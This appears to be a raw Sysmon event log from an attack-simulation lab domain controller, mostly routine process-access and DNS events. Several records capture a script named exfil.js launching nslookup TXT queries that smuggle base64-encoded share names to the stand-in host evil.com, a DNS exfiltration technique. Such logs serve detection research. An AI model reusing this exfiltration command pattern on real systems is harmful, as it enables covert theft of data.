14:16:20.342{2E1864BB-17B4-629A-283F-000000005F02}29327308C:\Windows\system32\conhost.exe{2E1864BB-17B4-629A-273F-000000005F02}4816C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.327{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-283F-000000005F02}2932C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.311{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.311{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.311{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.311{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.311{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-273F-000000005F02}4816C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.311{2E1864BB-17A1-629A-783D-000000005F02}55525628C:\Windows\System32\WScript.exe{2E1864BB-17B4-629A-273F-000000005F02}4816C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.321{2E1864BB-17B4-629A-273F-000000005F02}4816C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgqfkhdc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.311{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrpckz.tmpMD5=3A2317C9FD900A859CF011E0E257F84B,SHA256=3526444D988B70677FDC7B72CFB724A402371630F20BEF65D3F298944DCB36B6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.274{2E1864BB-17B4-629A-253F-000000005F02}79487596C:\Windows\system32\conhost.exe{2E1864BB-17B4-629A-263F-000000005F02}5044C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000197321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.210{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52410- 354300x8000000000000000197320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.210{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52409- 354300x8000000000000000197319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.209{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52408- 354300x8000000000000000197318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.063{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52407- 354300x8000000000000000197317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.062{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52406- 354300x8000000000000000197316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.061{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52405- 354300x8000000000000000197315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.061{00000000-0000-0000-0000-000000000000}6116<unknown process>-udptruefalse127.0.0.1-52405-false127.0.0.1-53domain 354300x8000000000000000197314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.920{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52404- 354300x8000000000000000197313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.918{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52403- 354300x8000000000000000197312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.917{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52402- 354300x8000000000000000197311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.917{00000000-0000-0000-0000-000000000000}2672<unknown process>-udptruefalse127.0.0.1-52402-false127.0.0.1-53domain 354300x8000000000000000197310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.779{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52401- 354300x8000000000000000197309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.778{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52400- 354300x8000000000000000197308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.778{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52399- 354300x8000000000000000197307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.778{00000000-0000-0000-0000-000000000000}5100<unknown process>-udptruefalse127.0.0.1-52399-false127.0.0.1-53domain 354300x8000000000000000197306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.606{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52398- 354300x8000000000000000197305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.606{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52397- 10341000x8000000000000000197304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.258{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-263F-000000005F02}5044C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.258{2E1864BB-17B4-629A-243F-000000005F02}72006372C:\Windows\system32\cmd.exe{2E1864BB-17B4-629A-263F-000000005F02}5044C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.258{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.258{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.258{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.258{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.267{2E1864BB-17B4-629A-263F-000000005F02}5044C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B4-629A-243F-000000005F02}7200C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrpckz.tmp 2>&1 10341000x8000000000000000197297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.242{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B4-629A-253F-000000005F02}7948C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.242{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B4-629A-253F-000000005F02}7948C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.227{2E1864BB-17B4-629A-253F-000000005F02}79487596C:\Windows\system32\conhost.exe{2E1864BB-17B4-629A-243F-000000005F02}7200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.227{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-253F-000000005F02}7948C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.211{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-243F-000000005F02}7200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.211{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.211{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.211{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 